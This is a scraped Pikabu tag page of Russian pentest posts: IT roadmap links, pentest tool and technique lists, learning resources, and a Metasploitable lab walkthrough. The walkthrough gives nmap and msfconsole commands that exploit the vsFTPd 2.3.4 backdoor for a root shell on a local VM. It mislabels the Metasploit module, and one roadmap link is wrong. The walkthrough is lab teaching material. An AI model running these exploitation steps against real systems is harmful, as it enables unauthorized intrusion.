Горячее
Лучшее
Свежее
Подписки
Сообщества
Блоги
Эксперты
#Круги добра
Войти
Забыли пароль?
или продолжите с
Создать аккаунт
Я хочу получать рассылки с лучшими постами за неделю
или
Восстановление пароля
Восстановление пароля
Получить код в Telegram
Войти с Яндекс ID Войти через VK ID
Создавая аккаунт, я соглашаюсь с правилами Пикабу и даю согласие на обработку персональных данных.
ПромокодыРаботаКурсыРекламаИгрыПополнение Steam
Пикабу Игры +1000 бесплатных онлайн игр Захватывающая аркада-лабиринт по мотивам культовой игры восьмидесятых. Управляйте желтым человечком, ешьте кексы и постарайтесь не попадаться на глаза призракам.

Пикман

Аркады, На ловкость, 2D

Играть

Топ прошлой недели

  • SpongeGod SpongeGod 1 пост
  • Uncleyogurt007 Uncleyogurt007 9 постов
  • ZaTaS ZaTaS 3 поста
Посмотреть весь топ

Лучшие посты недели

Рассылка Пикабу: отправляем самые рейтинговые материалы за 7 дней 🔥

Нажимая кнопку «Подписаться на рассылку», я соглашаюсь с Правилами Пикабу и даю согласие на обработку персональных данных.

Спасибо, что подписались!
Пожалуйста, проверьте почту 😊

Помощь Кодекс Пикабу Команда Пикабу Моб. приложение
Правила соцсети О рекомендациях О компании
Промокоды Биг Гик Промокоды Lamoda Промокоды МВидео Промокоды Яндекс Директ Промокоды Отелло Промокоды Aroma Butik Промокоды Яндекс Путешествия Постила Футбол сегодня
0 просмотренных постов скрыто
1024
DELETED
1 год назад

Сборник Roadmap по самым распространённым направлениям в IT⁠⁠

самое важное после определения цели составить план и начать действовать, если вы учите что то из списка то план за вас расписали, остаётся только действовать

• cybersecurity: https://roadmap.sh/cyber-security

• Frontend: https://roadmap.sh/frontend

• Backend: https://roadmap.sh/backend

• Devops: https://roadmap.sh/devops

• ReactJS: https://roadmap.sh/react

• Android: https://roadmap.sh/android

• Angular: https://roadmap.sh/angular

• Python: https://roadmap.sh/python

• Golang: https://roadmap.sh/golang

• Java: https://roadmap.sh/java

• С++: developer:https://roadmap.sh/cpp

• JS: https://roadmap.sh/javascript

• SQL: https://roadmap.sh/sql

• Docker Roadmap:https://roadmap.sh/docker

• MongoDB: https://roadmap.sh/docker

больше базы в нашем тг

[моё] IT Roadmap Пентест Информационная безопасность Текст Подборка Backend Frontend Python
140
FanateG
FanateG
1 год назад

Хочу стартануть в пентесте⁠⁠

Начал прохождение курса на Skillfactory(не реклама), но я овощ в этом плане, но интересно ппц) есть советы по литературе или может по комплексным видео о базисах в этой теме, заранее благодарю)

[моё] IT Пентест Новичок Новичок на Пикабу Текст
15
Lifehack
Lifehack
1 год назад
Life-Hack [Жизнь-Взлом]/Хакинг

MUST HAVE: ТОП-8 инструментов для пентеста⁠⁠

MUST HAVE: ТОП-8 инструментов для пентеста Хакеры, Информационная безопасность, IT, Пентест, Подборка, Рекомендации, Взлом

Мы собрали 8 полезных инструментов, которые широко используются пентестерами по всему миру, помогают находить бреши в безопасности и своевременно их устранять.

- Для удобства мы разделили их на 3 категории: Брутфорсеры, сканеры сетей и анализаторы трафика:

Брутфорсеры:

1. John the Ripper - инструмент, который используется для аудита слабых паролей. Данный инструмент хорошо зарекомендовал себя в сфере пентеста. Программа поддерживает сразу несколько вариантов атак:

- перебором по словарю;

- полным перебором (брутфорс);

- гибридным способом.

2. THC-Hydra - Простой в использовании многофункциональный брутфорс паролей, который завоевал популярность среди пентестеров по всему миру. Hydra поддерживает большое количество служб, отличается высокой скоростью работы, надёжностью и открытым исходным кодом.

3. RainbowCrack - Популярный взломщик хешей, который характеризуется высокой скоростью работы. Отличается от многих брутфорсов способом взлома: вместо грубого перебора комбинаций с вычислением и сравнением хеша с искомым значением, RainbowCrack сравнивает хеш со значениями из предкалькулированной таблицы.

- То есть время тратится только на сравнение, что способствует быстрому получению результата.

Сканеры сетей:

4. Nmap - утилита для сканирования и аудита безопасности сетей. Инструмент широко используется для сканирования узлов, получения списка открытых портов, сканирования запущенных сервисов и идентификации хостов в сети.

5. ZMap - инструмент изначально создавался как более быстрая альтернатива Nmap для сканирования всей сети, а не отдельных фрагментов.

Чтобы добиться скорости в 1,4 млн пакетов в секунду, достаточно обычного компьютера с гигабитным соединением. (высокая нагрузка, которая способна вывести из строя сетевое оборудование, аккуратней)

6. Masscan - Ещё один массовый асинхронный сканер, который работает со скоростью до 25 млн пакетов в секунду. Полезен для сканирования огромных сетей, таких как Интернет.

Анализаторы трафика:

7. tcpdump - сниффер с интерфейсом командной строки, с которым можно посмотреть, какие пакеты проходят через сетевую карту в данный момент.

- Чаще всего используется для отладки сети и в учебных целях, но возможности утилиты также позволяют проводить сетевые атаки и выявлять сканирование хоста.

8. mitmproxy - утилита для отладки, тестирования, оценки уровня конфиденциальности и тестирования на проникновение. С mitmproxy можно перехватывать, проверять, изменять и воспроизводить поток HTTP-трафика.

- Благодаря такой функциональности утилита широко используется не только хакерами и пентестерами, но также разработчиками веб-приложений для их своевременной отладки.

Мы в телеграме!

Показать полностью
[моё] Хакеры Информационная безопасность IT Пентест Подборка Рекомендации Взлом
37
3
Lifehack
Lifehack
2 года назад
Life-Hack [Жизнь-Взлом]/Хакинг

Metasploitable: Пример атаки⁠⁠

Поскольку взламывать чужие компьютеры незаконно а запах уязвимостей манит так-же как кровь для вампира имеет смысл организовать небольшую, скромную пентест лабораторию у себя в сети.

Существует много приложений, которые могут Вам помочь протестировать свои навыки или всячески попытаться их улучшить. Ими являются BWapp, Damn Vulnerable Web Application (DVWA), огромное количество CTF соревнований и многое другое.

#Metasploitable

Однако сегодня мы скачиваем целую виртуальную машину. Идем сюда https://sourceforge.net/projects/metasploitable/ и просто ждем завершения загрузки. Надеюсь, что мне не нужно учить Вас как создать виртуальную машину. Вкратце скажу что я предпочитаю Oracle VirtualBox. Это бесплатно и очень круто. Создаем машину с ubutu 64x и подключаем к ней виртуальный диск, который у нас есть.

#Дисклеймер

Маленький дисклеймер. Друзья, все что будет рассказано в данном посте, показывается исключительно для вашего самообразования и никак иначе. Если хотите что-то взломать, станьте пентестером или проходите CTF. Никогда не используйте знания во вред окружающим!

А, и кстати. Создайте сетевой мост у себя на компьютере. Через NAT ничего работать не будет. Теперь когда все готово мы запускаем машину и входим туда с помощью данных msfadmin:msfadmin.

Теперь давайте зайдем в Kali Linux и посмотрим, что там будет.

#Nmap

Я бы с радостью воспользовался нормальными сканнерами уязвимостей по типу Nessus или OpenVas, но мы будем использовать nmap, в котором уже есть скрипты для выявления уязвимостей. Кстати через прокси или тор они не работают поэтому чтобы что-то взломать вам придется знать наизусть как эксплуатируется тот или иной web сервис.

Поехали. Заходим в metasploitable и смотрим наш локальный ip адрес. В моем случае он -  192.168.1.131.

#Начало сканирования

Пишем в kali linux следующую компанду:

💣sudo nmap -sV -Pn --script vulners 192.168.1.131

Флаг sV означает, что мы получим дополнительную информацию о названии сервиса за портом и версией его патча.

Флаг Pn означает, что мы не отправим  ping запросов и будем рассматривать все хосты будто бы они онлайн, пропустим обнаружение хостов.

#Выбор уязвимости

Через пару секунд мы видим огромное количество уязвимостей. Нас интересует самые высокие. В качестве примера возьмем CVE-2011-2523.

#msfconsole

Гуглим все про уязвимость а вместе с этим открываем msfconsole и пишем:

💣search ftp

💣use exploit unix/ftp/proftpd133cbackdoor

Выбираем полезную нагрузку. Я выбрал cmd/unix/interact.

💣Set payload payload/cmd/interact.

💣set RHOSTS 192.168.1.131

Тут как вы понимаете ip metasploitable в локалке.

Exploit

И видим следующее:

192.168.1.131:21 - Banner: 220 (vsFTPd 2.3.4)

* 192.168.1.131:21 - USER: 331 Please specify the password.

+ 192.168.1.131:21 - Backdoor service has been spawned, handling...

+ 192.168.1.131:21 - UID: uid=0(root) gid=0(root)

* Found shell.

* Command shell session 1 opened (192.168.1.15:39957 -> 192.168.1.131:6200)

Информация предоставлена исключительно в ознакомительных целях!

Мы в телеграме!

Показать полностью
[моё] Хакеры IT Запрет Linux Пентест Информационная безопасность Взлом Текст
1
Lifehack
Lifehack
2 года назад
Life-Hack [Жизнь-Взлом]/Хакинг

10 популярных техник пентестеров⁠⁠

1. Социальная инженерия - использование методов манипуляции или обмана пользователей для получения доступа к информации или системам.

2. Сканирование уязвимостей - обнаружение уязвимостей в системах или приложениях, которые могут быть использованы для несанкционированного доступа.

3. Эксплойтинг уязвимостей - использование уязвимостей для получения доступа к системам или приложениям.

4. Перехват данных и трафика - сбор трафика сети или перехват информации, передаваемой по сети.

5. Физические взломы - использование физической уязвимости систем, таких как недостаточная защита физического доступа к серверам или злоупотребление доверием.

6. Анализ протоколов - анализ протоколов сетевого взаимодействия, чтобы обнаружить уязвимости и определить слабые места.

7. Расширение привилегий - получение дополнительных привилегий, которые могут использоваться для выполнения вредоносных действий.

8. Реверс-инжиниринг - анализ кода приложений или систем, чтобы определить слабые места или способы обхода механизмов защиты.

9. Взлом беспроводных сетей - получение доступа к беспроводным сетям, которые не защищены или защищены недостаточно.

10. Внедрение вредоносных программ - использование вредоносных программ для получения доступа к системам или приложениям, а также для уничтожения данных или нарушения работы систем.

Мы в телеграме!

[моё] Хакеры IT Технологии Информационная безопасность Взлом Пентест Текст
1
Lifehack
Lifehack
2 года назад
Life-Hack [Жизнь-Взлом]/Хакинг

Шпаргалка по sqlmap, 2023⁠⁠

Сохрани себе и перешли другу!

Шпаргалка по sqlmap, 2023 Пентест, Информационная безопасность, Хакеры, IT, Взлом, Шпаргалка

Хорошее качество тут!

Пентест Информационная безопасность Хакеры IT Взлом Шпаргалка
7
14
Lifehack
Lifehack
2 года назад
Life-Hack [Жизнь-Взлом]/Хакинг

Топ 10 ресурсов на русском языке, которые могут помочь в изучении Пентеста⁠⁠

Вот список из 10 ресурсов на русском языке, которые могут помочь в изучении пентестирования:

1. Infosec Institute – это онлайн-платформа, предоставляющая учебный материал по пентестированию и другим аспектам кибербезопасности.

2. Журнал «Хакер» – это ежемесячное издание, которое содержит статьи, новости и другие материалы на тему информационной безопасности и пентестирования.

3. Интернет-ресурс Hackerdom.ru - это уникальный ресурс, на котором есть обучающие и справочные статьи, видеоуроки и множество других материалов о пентестировании.

4. PentesterLab – это онлайн-платформа, разработанная специально для практического изучения пентестирования и соответствующих навыков.

5. Курс «Основы пентеста» от портала SecurityLab.ru – это бесплатный курс, который предоставляет базовые знания и навыки по проведению пентестирования.

6. Интернет-ресурс Xakep.ru – это еще один уникальный ресурс, на котором много обучающих и справочных статей о пентестировании.

7. Видеоуроки на канале YouTube «Хакер»– на этом канале есть множество видеоуроков по пентестированию, которые могут быть полезны для начинающих.

8. Курс «Advanced Web Penetration Testing» на хакерской онлайн-платформе Cybrary – это платный курс, который позволяет более глубоко изучить пентестирование веб-приложений.

9. Книга «Hacking Web Applications» Венджеля Рамира – это книга о проведении пентестирования веб-приложений, которая содержит множество полезных советов и техник.

10. Курс «Web Application Penetration Testing» на онлайн-платформе Udemy – это обучающий курс, предоставляющий основные знания и навыки по проведению пентестирования веб-приложений.

Некоторые из этих книг вы можете найти в нашей библиотеке!

Мы в телеграме:

Life-Hack [Жизнь-Взлом]/Хакинг

Показать полностью
[моё] Взлом Пентест IT Хакеры Linux Текст
3
denkoter
denkoter
2 года назад

Когда выбираешь Wi-Fi адаптер для пентеста⁠⁠

Когда выбираешь Wi-Fi адаптер для пентеста
Информационная безопасность Хакеры Blackhat Пентест
5
Посты не найдены
О нас
О Пикабу Контакты Реклама Сообщить об ошибке Сообщить о нарушении законодательства Отзывы и предложения Новости Пикабу Мобильное приложение RSS
Информация
Помощь Кодекс Пикабу Команда Пикабу Конфиденциальность Правила соцсети О рекомендациях О компании
Наши проекты
Блоги Работа Промокоды Игры Курсы
Партнёры
Промокоды Биг Гик Промокоды Lamoda Промокоды Мвидео Промокоды Яндекс Директ Промокоды Отелло Промокоды Aroma Butik Промокоды Яндекс Путешествия Постила Футбол сегодня
На информационном ресурсе Pikabu.ru применяются рекомендательные технологии